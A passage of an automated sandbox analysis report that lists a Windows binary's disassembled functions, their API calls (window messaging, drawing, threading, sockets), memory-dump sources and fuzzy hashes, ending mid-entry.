                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2502553879-0
                                                                                                                                                    • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                                    • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                                                    • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                                    • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                                                    Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32 ref: 00448C69
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                                                    Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastacceptselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 385091864-0
                                                                                                                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                                                    Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                                                    Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1358664141-0
                                                                                                                                                    • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                    • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                                                    • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                    • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                                                    Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                                    • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                    • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                                                    • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                    • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                                                    Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                    • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                    • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                                                    • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                    • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                                                    Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1187119602-0
                                                                                                                                                    • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                    • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                                                    • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                    • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                                                    Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1597257046-0
                                                                                                                                                    • Opcode ID: 4c4580c226b57f615dac04873813745d63ecd7a44388bc767de67aba20fe6967
                                                                                                                                                    • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                                                    • Opcode Fuzzy Hash: 4c4580c226b57f615dac04873813745d63ecd7a44388bc767de67aba20fe6967
                                                                                                                                                    • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                                                                    Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                                                    • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 237123855-0
                                                                                                                                                    • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                                    • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                                                                    • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                                    • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                                                                    Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3349847261-0
                                                                                                                                                    • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                                    • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                                                    • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                                    • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                                                    Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                                    • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                    • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                                                    • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                    • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                                                    Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                                                    • EndPath.GDI32(?), ref: 00447336
                                                                                                                                                    • StrokePath.GDI32(?), ref: 00447344
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2783949968-0
                                                                                                                                                    • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                    • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                                                    • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                    • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                                                    Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004364A3
